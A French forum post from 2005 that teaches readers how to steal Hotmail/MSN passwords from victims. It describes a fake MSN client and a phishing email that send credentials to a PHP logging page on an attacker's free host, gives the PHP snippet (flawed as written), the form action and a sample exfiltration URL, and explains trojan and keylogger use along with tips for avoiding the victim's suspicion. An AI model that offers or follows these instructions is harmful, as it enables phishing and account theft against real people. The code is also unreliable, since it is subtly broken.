| Neo | | Administrateur | | 15 messages postés |
|  Posté le 16-01-2005 à 12:17:16  
| Hacking: MSN/Hotmail
Introduction
Dans cette arcticle je vais vous parlez d'un sujet tres convoiter sur les board, site, etc : le "hacking" des boite Hotmail/MSN.
Tout d'abor sacher qu'il nexiste pas (contrairement à ce que certain croyent) de programme permettant d'avoir le pass d'une session hotmail en un seul clik!
Je vais vous aprendre à utiliser la ruse du SE (Social engineering) en utilisant les fake mail, ect ..
Ainsi que la récuperation des pass par certain programmes (Cheval de troie, KeyLog, ..) !
--------------------------------------------------------------------------------
Le Faux MSN
Pour la premiere méthode, vous devez connaitre un language de programmation ou un amis bien gentil qui vous le veras, si vous avez pas ca, opter pour une autre optionsl:
Donc, pour faire un fake, il faut desiner un faux messenger avec votre languge de programmation préférer.
Une fois que c'es fait, faite un compte sur un hebergeurs gratuit genre Lycos (C'es juste pour récuperer les pass) ..
Ensuite crée une petit page php qui resemble à ca;
<?
index=fopen("logs.txt","a");
fwrite(index, "\nMail: Pass: ");
fclose(index);
?>
Vous la nomer msn.php, et la transferer sur le compte que vous venez de crée.
Donc vous avez presque tout: l'interphase de MSN, le compte cher l'heberger gratuit, et votre page php.
Il ne manque plus q'un petit socket sur votre faux MSN qui va se connecter au site et asseyer d'acceder à la page msn.php avec les variable contenant le mail et le pass dans l'URL afin de vous transmettres les infos!
Exemple: http://vous.membres.lycos.fr/msn.php?mail=turlutu@msn.com&pass=chapeaupoitu
Si votre victime à bien asseyer de se connecter tape l'url http://vous.membres.lycos.fr/logs.txt et la magie magie, le pass et le login se trouve dan le fichier 
NB: Si vous ne savez pas utiliser les socket vous pouvez tjr ouvrir une fennetre Internet Exlporer qui va ouvrir l'URL (Ce que je vous déconseille car niveaux discression c'es pas terrible à moin de refaire une direction en javascript vers le site de Hotmail ..).
Penser aussi à faire un faux message d'erreur, car si rien ne se produit la vicitme risque de se méfier !
Voila pour le faux MSN. C'es une méthode que je vous recommande car peut de gens si attende tandis que le fake mail est assez connus !
--------------------------------------------------------------------------------
Fake Mail
Ha ca c'es simple, pour commencer vous devez crée un compte cher hotmail genre service_pass@hotmail.com oubien télécharger un mailleur anonyme qui accepte le HTML.
Jusqua présent, pas de probleme !
Ensuite ici, il va falloir connaitre un peu le HTML et savoir se servire d'un logicielle de dessin !
Donc ouvrez le bloc note ou votre éditeur HTML, et crée un formulaire demandans de remttres ses infos (Pass et login).
Soyer crédible, invoquer un plantage du server, une erreur, etc ..
N'hésiter pas à faire des logos avec votre logicielle de dessin pour que sa fasse vraiment réel !
Donc votre script est faux, normalement vous avez deux edit (Rectangle blanc ou il faut écrire) et un bouton.
Passez en mode texte (Code visible) et nommer l'edit de l'E-Mail "mail et celui du pass "pass" (Sans les ""
Apres, tout commme pour le faux MSN, crée un compte cher un heberger gratuit et crée une page nomée msn.php contenant c'es lignes:
<?
index=fopen("logs.txt","a");
fwrite(index, "\nMail: Pass: ");
fclose(index);
?>
Enregister la et transferer la sur votres site !
Rechercher la balise <form> dans votre script HTML et changer la par celle ci: <FORM METHOD="post" ACTION="http://vous.membres.lycos.fr/msn.php">
Voila voila, tout est pret, la page sur votre heberger, le code teminer.
Encore un point assez important, metter toutes les images utilisée sur votre site afin quelle s'affiches bien dans le script.
Quant tout est ok, envoyer le script à votre victime et taper l'URL http://vous.membres.lycos.fr/logs.txt, si la victime à mordu à l'ameson, son pass devrais de trouver dans le fichier!
Un petit conseil: Vous pouvez rajouter une redirection en javascript dans votre page msn.php afin de ne pas attirer l'attention de la victime !
--------------------------------------------------------------------------------
Troyen
La c'es simple mais il faut quelquen conditions:
Un nouveaux troyen indétectable par les anti-virus (Ou une victime sans anti-virus)
Une options capteur de touche sur le troyen !
Si vous avez c'es deux truc, rien de plus simple vous filler la partie server du troyen à votre pigeon.
Ensuite choper son ip (Avec la commande nestat sous DOS pendant le transfert ou avec le détecteur d'ip présent sur le site.).
Ok, vous avez son ip et le troyen est sur son ordinateur, connecter vous et lancer le capteur de touche.
Voila, toute les touche qui son frapée sur son clavier aparaise sur votre écrant, meme ces mot de pass.
Donc voila vous pouvez voir ce quil tape, il ne reste plus quan attendre que la victime aille lire c'es mail ou se connecte avec son compte.
Un petit conseil: Si vous avez la flemme d'attendre, vous pouvez lui envoyer un mail pour que celui ci se connecte à son compte pour l'ouvrir
--------------------------------------------------------------------------------
KeyLog
La aussi quelques conditions s'imposse.
Vous devez avoir access à l'ordinateur de la vitcime ou installer le key loger à distance.
Donc voila, vous avez un access à la machine de votre victime (Par exemple vous voulez piquer le pass d'une personne se connectant dans un Cyber-Cafer) et bien c'es simple, vous télécharger un keyloger (Disponible sur le site).
Une fois télécharger vous installer celui-ci et l'ouvrer.
Ok, tout est bon partez et faite semblant de rien ...
Votre victime arrive, se connecte, parle un peu et s'en vas ..
C'es parti, regardez dans le fichier du keylog et dénicher les pass de votre victime.
|
|
